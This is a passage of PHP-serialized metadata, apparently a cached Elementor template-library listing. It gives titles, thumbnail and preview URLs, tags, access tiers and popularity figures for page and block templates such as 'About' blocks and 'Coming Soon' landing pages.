Pages\",\"Remote\",\"Support\"]\";s:10:\"menu_order\";i:54;s:16:\"popularity_index\";i:806;s:11:\"trend_index\";i:634;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:313;a:20:{s:4:\"tmpl\";i:1248;s:2:\"id\";i:22134;s:5:\"title\";s:32:\"Art Magazine &#8211; Coming Soon\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/10/Art-Magazine-Coming-Soon-250x280-1.jpg\";s:12:\"tmpl_created\";i:1647176713;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/art-magazine-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:48:\"[\"Art\",\"Coming Soon\",\"Landing Pages\",\"Magazine\"]\";s:10:\"menu_order\";i:54;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:314;a:20:{s:4:\"tmpl\";i:512;s:2:\"id\";i:5525;s:5:\"title\";s:8:\"About 14\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_10.png\";s:12:\"tmpl_created\";i:1520443532;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-14/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:55;s:16:\"popularity_index\";i:9;s:11:\"trend_index\";i:29;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:315;a:20:{s:4:\"tmpl\";i:1189;s:2:\"id\";i:18560;s:5:\"title\";s:52:\"Finance Learning Platform &#8211; Under Construction\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Finance-Platform.png\";s:12:\"tmpl_created\";i:1617542761;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/lp/finance-learning-platform-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Under Construction\";s:4:\"tags\";s:27:\"[\"Finance\",\"Landing Pages\"]\";s:10:\"menu_order\";i:55;s:16:\"popularity_index\";i:843;s:11:\"trend_index\";i:561;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:316;a:20:{s:4:\"tmpl\";i:1225;s:2:\"id\";i:21041;s:5:\"title\";s:41:\"Business Consulting Company &#8211; About\";s:9:\"thumbnail\";s:96:\"https://library.elementor.com/wp-content/uploads/2021/12/8-About-Business-Consulting-Company.jpg\";s:12:\"tmpl_created\";i:1638797560;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/business-consulting-company-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:51:\"[\"Coach\",\"Collaboration\",\"Consulting\",\"Life Coach\"]\";s:10:\"menu_order\";i:55;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:317;a:20:{s:4:\"tmpl\";i:1187;s:2:\"id\";i:18528;s:5:\"title\";s:36:\"Home Decor Store &#8211; Coming Soon\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Home-Decore.png\";s:12:\"tmpl_created\";i:1617541784;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/lp/home-decor-store-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:57:\"[\"Coming Soon\",\"Decor\",\"Interior Design\",\"Landing Pages\"]\";s:10:\"menu_order\";i:56;s:16:\"popularity_index\";i:872;s:11:\"trend_index\";i:819;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:318;a:20:{s:4:\"tmpl\";i:1243;s:2:\"id\";i:21135;s:5:\"title\";s:28:\"Construction &#8211; Service\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/13-Service-Construction.jpg\";s:12:\"tmpl_created\";i:1638823202;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/construction-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:48:\"[\"Architecture\",\"Construction\",\"Faq\",\"Services\"]\";s:10:\"menu_order\";i:56;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:319;a:20:{s:4:\"tmpl\";i:501;s:2:\"id\";i:5429;s:5:\"title\";s:8:\"About 16\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_4.png\";s:12:\"tmpl_created\";i:1520443510;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-16/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:56;s:16:\"popularity_index\";i:59;s:11:\"trend_index\";i:8;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:320;a:20:{s:4:\"tmpl\";i:1174;s:2:\"id\";i:17504;s:5:\"title\";s:29:\"Hair Stylist &#8211; Business\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/02/250x280-3.png\";s:12:\"tmpl_created\";i:1612883014;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/lp/hair-stylist-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:59:\"[\"Business\",\"Hair\",\"hairdresser\",\"Landing Pages\",\"Stylist\"]\";s:10:\"menu_order\";i:57;s:16:\"popularity_index\";i:840;s:11:\"trend_index\";i:806;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:321;a:20:{s:4:\"tmpl\";i:1223;s:2:\"id\";i:20981;s:5:\"title\";s:37:\"Creative Digital Agency &#8211; About\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2021/12/6-About-Creative-Digital-Agency.jpg\";s:12:\"tmpl_created\";i:1638789303;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/creative-digital-agency-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:51:\"[\"About\",\"Advisor\",\"Creative\",\"Creative Portfolio\"]\";s:10:\"menu_order\";i:57;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:322;a:20:{s:4:\"tmpl\";i:1184;s:2:\"id\";i:18449;s:5:\"title\";s:45:\"Aesthetic Clinic &#8211; Health &amp; Fitness\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2021/03/Aesthetic-Clinic.png\";s:12:\"tmpl_created\";i:1616682181;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/lp/aesthetic-clinic-health-fitness/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Health and Fitness\";s:4:\"tags\";s:57:\"[\"Aesthetic\",\"Beauty\",\"Fitness\",\"Health\",\"Landing Pages\"]\";s:10:\"menu_order\";i:58;s:16:\"popularity_index\";i:859;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:323;a:20:{s:4:\"tmpl\";i:1221;s:2:\"id\";i:20926;s:5:\"title\";s:33:\"Doctors Online Consultation -Home\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/12/4-Home-Doctors-Online-Consultation.jpg\";s:12:\"tmpl_created\";i:1638787371;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/doctors-online-consultation-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:35:\"[\"App\",\"Health\",\"Medical\",\"Online\"]\";s:10:\"menu_order\";i:58;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:324;a:20:{s:4:\"tmpl\";i:505;s:2:\"id\";i:5464;s:5:\"title\";s:8:\"About 17\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_6.png\";s:12:\"tmpl_created\";i:1520443518;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-17/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:58;s:16:\"popularity_index\";i:220;s:11:\"trend_index\";i:142;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:325;a:20:{s:4:\"tmpl\";i:1165;s:2:\"id\";i:17353;s:5:\"title\";s:44:\"Online Cooking Course &#8211; Online Service\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/02/250x280-2.png\";s:12:\"tmpl_created\";i:1612705144;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/lp/online-cooking-course-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:50:\"[\"Cooking\",\"Course Online\",\"Food\",\"Landing Pages\"]\";s:10:\"menu_order\";i:59;s:16:\"popularity_index\";i:845;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:326;a:20:{s:4:\"tmpl\";i:1188;s:2:\"id\";i:18550;s:5:\"title\";s:39:\"Online Store &#8211; Under Construction\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Online-Store.png\";s:12:\"tmpl_created\";i:1617542506;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/lp/online-store-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:18:\"Under Construction\";s:4:\"tags\";s:59:\"[\"Landing Pages\",\"Online Shop\",\"Shop\",\"Under Construction\"]\";s:10:\"menu_order\";i:60;s:16:\"popularity_index\";i:832;s:11:\"trend_index\";i:600;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:327;a:20:{s:4:\"tmpl\";i:1250;s:2:\"id\";i:22140;s:5:\"title\";s:33:\"Design School &#8211; Coming Soon\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/05/250x280-1.png\";s:12:\"tmpl_created\";i:1647177317;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/design-school-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:49:\"[\"Coming Soon\",\"Design\",\"Landing Pages\",\"School\"]\";s:10:\"menu_order\";i:60;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:328;a:20:{s:4:\"tmpl\";i:510;s:2:\"id\";i:5504;s:5:\"title\";s:8:\"About 18\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_9.png\";s:12:\"tmpl_created\";i:1520443528;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-18/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:60;s:16:\"popularity_index\";i:104;s:11:\"trend_index\";i:46;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:329;a:20:{s:4:\"tmpl\";i:1191;s:2:\"id\";i:18539;s:5:\"title\";s:40:\"Travel Agency &#8211; Under Construction\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Travel-Agency-1.png\";s:12:\"tmpl_created\";i:1617610273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/travel-agency-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Under Construction\";s:4:\"tags\";s:56:\"[\"Agency\",\"Landing Pages\",\"Travel\",\"Under Construction\"]\";s:10:\"menu_order\";i:61;s:16:\"popularity_index\";i:876;s:11:\"trend_index\";i:652;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:330;a:20:{s:4:\"tmpl\";i:1175;s:2:\"id\";i:18270;s:5:\"title\";s:24:\"Open week &#8211; Events\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2021/03/250x280.png\";s:12:\"tmpl_created\";i:1614767186;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/lp/open-week-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:59:\"[\"Education\",\"Event\",\"Events\",\"Landing Pages\",\"University\"]\";s:10:\"menu_order\";i:62;s:16:\"popularity_index\";i:831;s:11:\"trend_index\";i:673;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:331;a:20:{s:4:\"tmpl\";i:1177;s:2:\"id\";i:18300;s:5:\"title\";s:30:\"Makeup Artist &#8211; Business\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/03/250x280-2.png\";s:12:\"tmpl_created\";i:1614768608;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/makeup-artist-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:79:\"[\"Beauty\",\"Business\",\"Course Online\",\"Landing Pages\",\"Makeup\",\"Online Service\"]\";s:10:\"menu_order\";i:63;s:16:\"popularity_index\";i:861;s:11:\"trend_index\";i:783;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:332;a:20:{s:4:\"tmpl\";i:511;s:2:\"id\";i:5515;s:5:\"title\";s:8:\"About 19\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_9.png\";s:12:\"tmpl_created\";i:1520443530;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-19/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:63;s:16:\"popularity_index\";i:268;s:11:\"trend_index\";i:161;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:333;a:20:{s:4:\"tmpl\";i:1179;s:2:\"id\";i:18329;s:5:\"title\";s:63:\"Online Real Estate Investment Conference &#8211; Online Service\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/03/250x280-5.png\";s:12:\"tmpl_created\";i:1614770404;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:157:\"https://library.elementor.com/lp/online-real-estate-investment-conference-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:76:\"[\"Conference\",\"Event\",\"Events\",\"Landing Pages\",\"Online Event\",\"Real estate\"]\";s:10:\"menu_order\";i:64;s:16:\"popularity_index\";i:866;s:11:\"trend_index\";i:779;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:334;a:20:{s:4:\"tmpl\";i:506;s:2:\"id\";i:5472;s:5:\"title\";s:7:\"About 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_7.png\";s:12:\"tmpl_created\";i:1520443520;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/about-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:64;s:16:\"popularity_index\";i:210;s:11:\"trend_index\";i:116;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:335;a:20:{s:4:\"tmpl\";i:1183;s:2:\"id\";i:18391;s:5:\"title\";s:45:\"Children&#8217;s Optometrist &#8211; Business\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2021/03/Library-Pic-Childrens-Optometrist.png\";s:12:\"tmpl_created\";i:1614773564;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/lp/childrens-optometrist-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:85:\"[\"Business\",\"Children\",\"Eye\",\"Glasses\",\"Health\",\"Kids\",\"Landing Pages\",\"Optometrist\"]\";s:10:\"menu_order\";i:65;s:16:\"popularity_index\";i:877;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:336;a:20:{s:4:\"tmpl\";i:1182;s:2:\"id\";i:18366;s:5:\"title\";s:30:\"Car Insurance &#8211; Business\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/03/Library-Pic-Car-Insurance.png\";s:12:\"tmpl_created\";i:1614773263;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/car-insurance-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:46:\"[\"Business\",\"car\",\"Insurance\",\"Landing Pages\"]\";s:10:\"menu_order\";i:66;s:16:\"popularity_index\";i:869;s:11:\"trend_index\";i:797;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:337;a:20:{s:4:\"tmpl\";i:1201;s:2:\"id\";i:19144;s:5:\"title\";s:25:\"Birthday Party Invitation\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2021/06/250x280.png\";s:12:\"tmpl_created\";i:1623848691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/birthday-party-invitation/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:67:\"[\"Birthday\",\"Event\",\"Landing Pages\",\"Party\",\"RSVD\",\"Save the Date\"]\";s:10:\"menu_order\";i:66;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:338;a:20:{s:4:\"tmpl\";i:1124;s:2:\"id\";i:16473;s:5:\"title\";s:26:\"Beauty Salon &#8211; About\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/12/about-1.jpg\";s:12:\"tmpl_created\";i:1608622373;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/beauty-salon-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:67;s:16:\"popularity_index\";i:615;s:11:\"trend_index\";i:184;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:339;a:20:{s:4:\"tmpl\";i:1176;s:2:\"id\";i:18291;s:5:\"title\";s:47:\"Grill Restaurant Food Delivery &#8211; Business\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/03/Library-Pic-Food-Delivery-LP.png\";s:12:\"tmpl_created\";i:1614767830;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/lp/grill-restaurant-food-delivery-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:79:\"[\"Delivery\",\"Delivery Service\",\"Fast Food\",\"Food\",\"Landing Pages\",\"Restaurant\"]\";s:10:\"menu_order\";i:67;s:16:\"popularity_index\";i:819;s:11:\"trend_index\";i:685;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:340;a:20:{s:4:\"tmpl\";i:504;s:2:\"id\";i:5455;s:5:\"title\";s:8:\"About 20\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_6.png\";s:12:\"tmpl_created\";i:1520443516;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-20/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:67;s:16:\"popularity_index\";i:134;s:11:\"trend_index\";i:70;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:341;a:20:{s:4:\"tmpl\";i:1125;s:2:\"id\";i:16488;s:5:\"title\";s:28:\"Beauty Salon &#8211; 